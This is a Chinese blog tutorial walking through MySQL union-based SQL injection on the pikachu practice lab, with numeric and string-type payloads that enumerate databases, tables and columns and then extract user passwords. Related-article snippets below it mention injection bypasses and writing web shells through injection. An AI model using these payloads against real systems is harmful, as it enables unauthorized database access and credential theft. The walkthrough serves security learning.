Mysql注入

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量486 收藏
点赞数 1
文章标签: mysql 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hhhshd/article/details/121117377
版权

**

一、SQL注入概念

**

  1. SQL注入是表示指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的回显,达到执行恶意SQL

**

二、SQL注入的思路

**

  1. 判断sql注入的类型,通常分为了数字型和字符型
  2. 拆解在sql中的字段的数量
  3. 获取到sql中当前的所有数据库
  4. 获取到数据库中的所有的表
  5. 获取到表中的字段名称
  6. 获取到需要的数据

**

三、pikachu注入分析

介绍:pikachu是一个漏洞练习平台。其中包含了常见的web漏洞。这次的sql注入将在pikachu这个靶场中进行
**

  1. 判断pikachu中数字型注入

id=1 and 1=1 返回正确
id=1 and 1=2 返回错误

在这里插入图片描述
在这里插入图片描述

  1. 利用order by查出字段数

id=1 order by 3

发现在查询字段数为3的会产生报错,所以字段数判断在3以下
在这里插入图片描述

id=1 order by 2

这次我们发现当字段数为2时候,没有报错,所以当前字段数为2在这里插入图片描述

  1. 使用联合查询出字段位

id=1 and 1=2 union select 1,2

在这里插入图片描述

  1. 查询出数据库名称

id=1 and 1=2 union select database(),2

查询数据库名称

  1. 第四步中已经发现出数据库名称为"pikachu",使用联合查询语句找出所有的表名

id=1 and 1=2 union select table_name from information_schema.tables where table_schema=‘pikachu’

在这里插入图片描述
6. 使用联合查询column来查询在第五步中查询到的表名的字段名称

id=1 and 1=2 union select column_name,2 from information_schema.columns where table_name=‘member’

在这里插入图片描述

  1. 使用查询到第六步中的字段名称,查询需要字段中的内容详细

id=1 and 1=2 union select id,pw from member

在这里插入图片描述

四、pikachu注入分析(二)

这次讲解为pikachu平台中sql注入字符型注入的判断

  1. 判断pikachu中字符型注入
  • 字符型注入中需要注意的是在字符型文本内容中与数字型不同,字符型内容有两个单引号或者两个双引号来闭合文件内容,才可以判断字符型注入。
    从报错中我们可以看出在name=1后面添加了一个单引号出现报错,原因是我们加入了一个单引号使其前面一个单引号与我们输入的单引号进行了闭合。

http://192.168.8.146/vul/sqli/sqli_str.php?name=1’

在这里插入图片描述

  1. 使用and或or对字符型注入来判断是否有注入点
    这里我们在最后增加了两个杠(空格)- -(空格)来对本身数据库中后面一个单引号进行注释

name=1’ and 1=2 - -
name=1’ or 1=1 - -

在这里插入图片描述
在这里插入图片描述

  • 为什么使用and和or返回的结果差距为什么这么大呢,我们从数据库的查询代码来学习。
  • 这里and是表示并且的连接,需要两个结果都为真时候才会返回正确的结果
  • 这里or是表示或者的连接,只需要两个结果中一个为真时候就可以返回正确的结果

select id,email from member where username=’ 1’and 1=2 - - ’
select id,email from member where username='1’or 1=1 - - ’

  1. 判断此注入中字段数为多少
    第一条命令用来判断此字段最大为多少
    第二条命令用来判断有几个字段

name=1’ order by 3
name=1’ union select 1,2

在这里插入图片描述
在这里插入图片描述

  1. 使用联合查询出数据库名称
    通过这一步的sql查询出数据库的名称为“pikachu”

name=1’ union select database(),2

在这里插入图片描述

  1. 使用联合查询语句找出所有的表名

name=1’ union select table_name,2 from information_schema.tables where table_schema=database()
name=1’ union select table_name,2 from information_schema.tables where table_schema=‘pikachu’

在这里插入图片描述

  1. 使用联合查询column来查询在第五步中查询到的表名的字段名称
    这一步从member表中查询出了表中的字段名称

name=1’ union select column_name,2 from information_schema.columns where table_name=‘member’

在这里插入图片描述

  1. 使用查询到第六步中的字段名称,查询需要字段中的内容详细

name=1’ union select id,pw from member

在这里插入图片描述

兔子呀~
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
mysql注入绕过技术
06-04
### MySQL注入绕过技术 #### 引言 在网络安全领域,SQL注入是一种常见的攻击手段,攻击者通过在应用程序中插入恶意SQL代码来控制数据库。针对这种威胁,许多开发者实施了过滤机制来防御潜在的SQL注入攻击。然而,...
sql注入
weixin_50887021的博客
06-10 95
复制 sql注入数字型字符型搜索型xx型布尔盲注基于时间盲注显错注入insert/update注入insertupdatedelete注入http headeruser-agentcookie宽字节 数字型 在pikachu上面选择数字4后 抓包 在包里将数字改为1‘ Send发现 数据报错 如下图所示 id=1 and 1=1# 数字型不需要单引号,双引号闭合,所以更容易受到攻击 id=1 union select 1,2 # id=1 union select 1,database()#
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 993
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
SQL注入MYSQL注入总结-20240517更新mysql可报错注入函数
qq_39764475的博客
08-12 2126
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
详细|通过mysql学习sql注入
st3pby的博客
06-08 989
本文来自 【网络安全学习圈】圈内师傅的学习成果,已将其入圈费用返还,如果你也想一块学习,欢迎加入。圈内规划了数个月的学习内容,并提供相应的学习资源和建议,以及一个浓厚的学习氛围。
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 2192
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users。现在这样子就知道了users这个表的所有字段名,假设知道了字段是:idusername,password。好了这样就知道所有的表名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
第01篇:MySQL注入点写WebShell的5种方式1
08-03
MySQL注入是一种常见的安全漏洞,它允许攻击者通过输入恶意SQL语句来操纵数据库。本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要...
mysql注入环境
01-16
MySQL注入环境是一个重要的网络安全话题,主要关注的是数据库系统的安全性和数据保护。在本文中,我们将深入探讨MySQL注入的原理、如何在Linux或Windows环境中搭建测试环境,以及如何使用sqli-labs进行实战演练。 ...
MYSQL 注入天书
03-04
MYSQL 注入天书,Sqli-labs 使用手册,结合Sqli-labs讲解Mysql注入方法。
sql注入(mysql)
m0_73452266的博客
04-20 534
sql注入基础
sql注入(4)mysql注入
c10udz的博客
04-13 4709
1.MySQL5.x结构框架 在MySQL 5.0以上版本中,为了方便管理,默认定义了information_schema数据 库,用来存储数据库元信息,其中经常用到的表有:schemata(记录数据库名),tables(记录表名),columns(列名或字段名) 在schemata表中,schema_name(记录数据库名) 在tables表中,table_schema(记录存储的数据库名),table_name(表名)(schema_name和table_name都记录了MySQL中所有的数据库
mysql 注入
qq_58970968的博客
07-31 1948
同一个服务器下的不同网站之间的数据库用户有可能是不同的,如果a网站可以有SQL注入,他的用户是root的话就可以实现跨站数据库入侵,去查看网站b下面的数据库;unionselect1,'x',3intooutfile'D\\x.php'--+写入文件‘x’到x.php中;当magic_quotes_gpc=On时,输入数据中含单引号(’)、双引号(”)、反斜线(\)与NULL(NULL字符)等字符,都会被加上反斜线;用来读取数据库下的文件;...
mysql注入的基本概念及简单示例(小心进局子)
m0_75032658的博客
04-10 627
MySQL注入是一种攻击技术,攻击者通过在应用程序的输入字段中插入或“注入”恶意的SQL代码,从而能够执行非授权的数据库操作。这种攻击通常针对那些没有对用户输入进行充分验证或转义的应用程序。下面我将详细说明MySQL注入的操作步骤、类型以及防御措施。
简要MYSQL注入
山兔的博客
03-31 511
SQL注入,一般不是一些低权限的,都会被认为是很严重的漏洞,不是所有的SQL注入都可以对网站后台进行getshell,它是需要条件的,这个条件我们称为权限。有的注入点,它是没有办法进行getshell的,他只能得到一些敏感信息,然后我们在一步步的去获取权限SQL注入的危害有两个,一个是危害到数据,一个是危害到网站的权限,满足条件的注入点就可以,没有这个条件的就不行。
SQL注入MYSQL注入
av11566的博客
04-19 7135
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
10-mysql数据注入
qq_56414082的博客
03-03 610
以其他字符替换字符串中的一些字符通过str_replace()函数把select这个关键字函数替换成别,让你无法使用//主要如果没有强调大小写,通过更换就可以绕过,还有编码等情况str_replace例:把字符串 “Hello world!php");?
mysql 注入扫描
12-02
MySQL注入扫描是一种针对网站或应用程序的安全漏洞进行检测的技术。通过MySQL注入漏洞,攻击者可以将恶意代码注入到网站或应用程序中,从而获取敏感信息、通过数据库执行命令或者破坏网站功能。因此,对于网站或应用程序的开发者和管理员来说,MySQL注入扫描是非常重要的。MySQL注入扫描可以通过自动化工具进行,也可以通过手动检测进行。 在进行MySQL注入扫描时,需要仔细分析网站或应用程序的输入点,例如表单输入、URL参数等,以及与MySQL数据库的交互。通过模拟攻击者的注入行为,可以检测出网站或应用程序的漏洞点,并进一步修复和加固系统的安全性。 为了有效进行MySQL注入扫描,可以借助一些自动化工具,例如Sqlmap、Netsparker、Acunetix等,这些工具可以自动检测网站或应用程序的漏洞点,并生成报告提醒管理员修复漏洞。同时,也需要对数据库进行严格的权限控制,以及对用户输入进行严格的验证和过滤,以防止注入攻击。 总的来说,MySQL注入扫描对于保障网站和应用程序的安全性是非常必要的,需要持续进行检测和修复漏洞,从而有效防范潜在的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值